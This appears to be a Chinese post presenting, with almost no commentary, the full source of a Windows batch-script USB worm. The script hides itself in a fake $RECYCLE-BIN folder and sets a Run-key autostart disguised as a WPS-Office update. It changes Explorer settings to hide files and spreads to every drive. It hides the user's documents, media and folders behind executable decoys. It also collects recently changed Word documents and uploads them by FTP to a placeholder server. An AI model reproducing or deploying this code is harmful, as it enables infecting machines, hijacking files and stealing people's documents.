话不多说 直接上代码
主程序代码
@echo off&setlocal enabledelayedexpansion
echo "%~sd0%~p0%~n0"
::----------------------------------------------------------------------------------------------------------------
::确定自身属性并开启文件夹
if /i not "%~d0%~p0" == "C:\$RECYCLE-BIN\" (
if /i not "%~d0%~p0" == "C:\Windows\System32\" (
md "%~sd0%~p0%~n0"
explorer "%~sd0%~p0%~n0"
attrib +s +a +h "%~sd0%~p0%~n0"
)
)
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::隐藏当前磁盘下自身根目录(若为启动项,则直接隐藏C盘根目录)
attrib +s +a +h "%~d0\$RECYCLE-BIN"
::----------------------------------------------------------------------------------------------------------------
::验证开发者权限,确定自身属性,安装
::有些系统环境下开机自启动后可能会把自身位置变成"C:\Windows\System32\"
if /i not exist "C:\Developer-Certificate\USB-hacker" (
::先简单来一次专一性杀毒,为C盘腾出空间
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
::-------------------------------------------------------------------------------------------------------------
::安装
md C:\$RECYCLE-BIN\Wpsupdater
attrib +s +a +h C:\$RECYCLE-BIN
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
::--------------------------------------------------------------------------------------------------------------
::重新注册启动项并更改隐藏可见权限
Reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d C:\$RECYCLE-BIN\start.exe /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f
)
::----------------------------------------------------------------------------------------------------------------
if /i not "%~sd0%~p0%~n0" == "C:\$RECYCLE-BIN\start" (
if /i not "%~d0%~p0" == "C:\Windows\System32\" (
if /i not exist "C:\$RECYCLE-BIN\start.exe" (
copy /y "%~d0\$RECYCLE-BIN\start.exe" "C:\$RECYCLE-BIN\"
start /d "C:\$RECYCLE-BIN\" start.exe
)
::----------------------------------------------------------------------------------------------------------
::任务完成,退出。
exit
)
)
::----------------------------------------------------------------------------------------------------------------
::开机后直接跳到此处执行,若非开机启动,此后不予执行。
::专一性杀毒,排除干扰先只杀C盘,以后的慢慢说。
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
for /f "delims=" %%g in ('dir/s/b C:\*.exe') do (
if %%~zg == 100616 (
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
taskkill /f /t /im %%~ng.exe
del "%%g"
)
)
::清除自身缓存
rd /s /q "C:\$RECYCLE-BIN\Cloud_synchronization"
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::初始化FTP,搜索文档制作列表
del C:\$RECYCLE-BIN\Winre.wim /q
rd /s /q "C:\$RECYCLE-BIN\Cloud_synchronization"
md C:\$RECYCLE-BIN\Cloud_synchronization
attrib +s +h +a C:\$RECYCLE-BIN\Cloud_synchronization
echo open ftp域名 > C:\$RECYCLE-BIN\Winre.wim
echo ftp账号>>C:\$RECYCLE-BIN\Winre.wim
echo 密码>>C:\$RECYCLE-BIN\Winre.wim
echo bin>>C:\$RECYCLE-BIN\Winre.wim
set da=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
set dc=.docx,.doc,.rtf
for %%f in (%da%) do (
if exist "%%f:\" (
for %%h in (%dc%) do (
for /f "tokens=*" %%g in ('dir /s/b %%f:\*%%h') do (
for /f "tokens=1-10 delims=/-: " %%i in ("%%~tg !date:~,10! !time:~,5!") do (
set/a y1=%%i,m1=1%%j%%100,d1=1%%k%%100,h1=1%%l%%100,f1=1%%m%%100,y2=%%n,m2=1%%o%%100,d2=1%%p%%100,h2=1%%q%%100,f2=1%%r%%100
set /a "f=(1461*(y2+(m2-14)/12)/4+367*(m2-2-(m2-14)/12*12)/12-3*((y2+(m2-14)/12)/100+1)/4-1461*(y1+(m1-14)/12)/4-367*(m1-2-(m1-14)/12*12)/12+3*((y1+(m1-14)/12)/100+1)/4-d1+d2)*1440+(h2-h1)*60+f2-f1"
if !f! leq 4320 (
copy /y "%%g" "C:\$RECYCLE-BIN\Cloud_synchronization\"
)
)
)
copy /y "%userprofile%\Desktop\*%%h" "C:\$RECYCLE-BIN\Cloud_synchronization\"
)
)
)
echo mput "C:\$RECYCLE-BIN\Cloud_synchronization\*" >>C:\$RECYCLE-BIN\Winre.wim
echo bye >>C:\$RECYCLE-BIN\Winre.wim
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::初始化参数
set da=a,b,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
set dd=.doc,.docx,.dot,.dotx
set de=.xls,.xlsx
set dmo=.mp4,.flv,.rmvb,.mpj,.mpg,.avi,.m4a,.mkv,.mov,.vob,.swf,.mpeg,.webm,.wmv,.3gp
set dmu=.mp3,.m4a,.cd,.ogg,.asf,.wma,.wav,.mp3pro,.rm,.real,.ape,.module,.midi,.vqf,.audible,.flac,.vbr
set dph=.jpg,.bmp,.tga,.tif,.psd
set dpp=.ppt,.pot,.pps,.sldx
set dt=.txt
set dz=.rar,.7z,.zip
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::清除已攻击标记,绕过未知BUG
for %%f in (%da%) do (
rd /s /q "C:\$RECYCLE-BIN\%%f"
md "C:\$RECYCLE-BIN\c"
)
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::初始化完毕,启动主干,攻击ABDEFGHIJKLMNOPQRSTUVWXYZ盘,程序循环从此处开始。
:str
for %%f in (%da%) do (
if exist "%%f:\" (
if /i not exist "C:\$RECYCLE-BIN\%%f" (
if /i not exist "%%f:\Developer-Certificate\USB-hacker" (
::--------------------------------------------------------------------------------------------------------
::开始自我繁殖
md %%f:\$RECYCLE-BIN\Wpsupdater
attrib +s +h +a "%%f:\$RECYCLE-BIN"
attrib +s +h +a "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\start.exe" "%%f:\$RECYCLE-BIN\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
::顺手杀毒,做个好人
for /f "delims=" %%g in ('dir/s/b %%f:\*.exe') do (
if %%~zg == 100616 (
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
taskkill /f /t /im %%~ng.exe
del "%%g"
)
)
::--------------------------------------------------------------------------------------------------------
::开始繁殖伪文件,隐藏原文件,删除快捷方式(快捷方式通常被用来绕过病毒,所以除掉)
for /f "tokens=*" %%d in ('dir /s/b %%f:\*lnk') do (
del "%%d"
)
for %%h in (%dd%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%d.exe"
)
)
for %%h in (%de%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%d.exe"
)
)
for %%h in (%dmo%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%d.exe"
)
)
for %%h in (%dmu%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%d.exe"
)
)
for %%h in (%dph%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%d.exe"
)
)
for %%h in (%dpp%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%d.exe"
)
)
for %%h in (%dt%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%d.exe"
)
)
for %%h in (%dz%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dz.stl" "%%d.exe"
)
)
::--------------------------------------------------------------------------------------------------------
::释放诱导文件
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%f:\伪视频文件,诱导用.avi.exe"
::--------------------------------------------------------------------------------------------------------
for /f "delims=" %%a in ('dir /b "%%f:\"') do (
set /a n+=1
set "wj!n!=%%a"
for /f "tokens=1* delims==" %%a in ('set wj') do (
echo "%%b"
for %%i in ("%%f:\%%b") do (
set stc=%%~ai
if "!stc:~0,1!"=="d" (
echo "%%i 是文件夹"
attrib +s +a +h "%%f:\%%b"
copy /y "C:\$RECYCLE-BIN\start.exe" "%%f:\%%b.exe"
)
)
)
)
)
copy /y "C:\$RECYCLE-BIN\Wpsupdater.exe" "%%f:\伪文件夹,诱导用.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f
ping -n 4 127.1 >nul
::创建已攻击标志
md C:\$RECYCLE-BIN\%%f
)
)
)
)
::----------------------------------------------------------------------------------------------------------------
::以牺牲代码简洁性为代价,再次绕过未知BUG
for %%f in (%da%) do (
if /i not exist "%%f:\" (
rd /s /q "C:\$RECYCLE-BIN\%%f"
)
)
::----------------------------------------------------------------------------------------------------------------
::开始攻击桌面
if /i not exist "C:\Developer-Certificate\USB-hacker" (
::顺手杀毒,做个好人
for /f "delims=" %%g in ('dir/s/b %userprofile%\Desktop\*.exe') do (
if %%~zg == 100616 (
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
taskkill /f /t /im %%~ng.exe
del "%%g"
)
)
::--------------------------------------------------------------------------------------------------------------
::开始繁殖伪文件,隐藏原文件
for %%h in (%dd%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%d.exe"
)
)
for %%h in (%de%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%d.exe"
)
)
for %%h in (%dmo%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%d.exe"
)
)
for %%h in (%dmu%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%d.exe"
)
)
for %%h in (%dph%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%d.exe"
)
)
for %%h in (%dpp%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%d.exe"
)
)
for %%h in (%dt%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%d.exe"
)
)
for %%h in (%dz%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dz.stl" "%%d.exe"
)
)
for /f "delims=" %%a in ('dir /b "%userprofile%\Desktop\"') do (
set /a n+=1
set "wj!n!=%%a"
for /f "tokens=1* delims==" %%a in ('set wj') do (
echo "%%b"
for %%i in ("%userprofile%\Desktop\%%b") do (
set stc=%%~ai
if "!stc:~0,1!"=="d" (
echo "%%i 是文件夹"
attrib +s +a +h "%userprofile%\Desktop\%%b"
copy /y "C:\$RECYCLE-BIN\start.exe" "%userprofile%\Desktop\%%b.exe"
)
)
)
)
)
copy /y "C:\$RECYCLE-BIN\Wpsupdater.exe" "%userprofile%\Desktop\伪文件夹,诱导用.exe"
del "%userprofile%\Desktop\Wpsupdater.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f
ping -n 4 127.1 >nul
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::文档再次同步,再次制作列表并初始化FTP
if /i not exist "C:\$RECYCLE-BIN\Winre.wim" (
echo open FTP服务器域名 > C:\$RECYCLE-BIN\Winre.wim
echo ftp账号>>C:\$RECYCLE-BIN\Winre.wim
echo 密码>>C:\$RECYCLE-BIN\Winre.wim
echo bin>>C:\$RECYCLE-BIN\Winre.wim
set da=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
set dc=.docx,.doc,.rtf
for %%f in (%da%) do (
if exist "%%f:\" (
for %%h in (%dc%) do (
for /f "tokens=*" %%g in ('dir /s/b %%f:\*%%h') do (
for /f "tokens=1-10 delims=/-: " %%i in ("%%~tg !date:~,10! !time:~,5!") do (
set/a y1=%%i,m1=1%%j%%100,d1=1%%k%%100,h1=1%%l%%100,f1=1%%m%%100,y2=%%n,m2=1%%o%%100,d2=1%%p%%100,h2=1%%q%%100,f2=1%%r%%100
set /a "f=(1461*(y2+(m2-14)/12)/4+367*(m2-2-(m2-14)/12*12)/12-3*((y2+(m2-14)/12)/100+1)/4-1461*(y1+(m1-14)/12)/4-367*(m1-2-(m1-14)/12*12)/12+3*((y1+(m1-14)/12)/100+1)/4-d1+d2)*1440+(h2-h1)*60+f2-f1"
if !f! leq 3 (
copy /y "%%g" "C:\$RECYCLE-BIN\Cloud_synchronization\"
)
)
)
)
)
)
)
echo mput "C:\$RECYCLE-BIN\Cloud_synchronization\*" >>C:\$RECYCLE-BIN\Winre.wim
echo bye >>C:\$RECYCLE-BIN\Winre.wim
::----------------------------------------------------------------------------------------------------------------
::再次注册开机启动项,避免查杀。
Reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d C:\$RECYCLE-BIN\start.exe /f
ping -n 16 127.1 >nul
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::FTP正式上传
if exist "C:\$RECYCLE-BIN\Winre.wim" (
@ping FTP服务器域名&&(
echo FTP_OK
FTP -s:C:\$RECYCLE-BIN\Winre.wim -i
rd /s /q "C:\$RECYCLE-BIN\Cloud_synchronization"
md C:\$RECYCLE-BIN\Cloud_synchronization
attrib +s +h +a "C:\$RECYCLE-BIN\Cloud_synchronization"
del "C:\$RECYCLE-BIN\Winre.wim"
)||echo FTP_error
)
::----------------------------------------------------------------------------------------------------------------
goto str |
|